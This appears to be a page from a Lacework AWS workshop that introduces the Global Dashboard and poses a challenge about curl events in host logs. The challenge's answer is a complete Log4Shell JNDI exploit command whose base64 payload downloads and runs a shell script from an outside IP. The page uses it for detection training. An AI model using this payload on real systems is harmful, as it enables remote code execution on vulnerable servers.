lacework-alliances/aws-immersion-day/content/4_lacework_console_overview/41_global_dashboard.md

 ![Lacework Compliance Events](/images/lacework-compliance-events.png)

 The _Global Dashboard_ provides a quick view of your cloud security posture.
 It gives you a summary of your security data, trends and events.

+***
+# Challenge
+{{%expand "In the Host Events pane, click through the New Application events to see what types of applications were launched.
+Select the curl event and explore the details.
+Can you find the curl command that was executed?" %}} curl -v http://a7aedb671d05b4dc996f3243e1ca253e-1577402981.us-west-2.elb.amazonaws.com:8080 -H X-Api-Version:${jndi:ldap://93.189.42.8:5557/Basic/Command/Base64/KGN1cmwgLXMgOTMuMTg5LjQyLjgvbGguc2h8fHdnZXQgLXEgLU8tIDkzLjE4OS40Mi44L2xoLnNoKXxiYXNo} {{% /expand%}}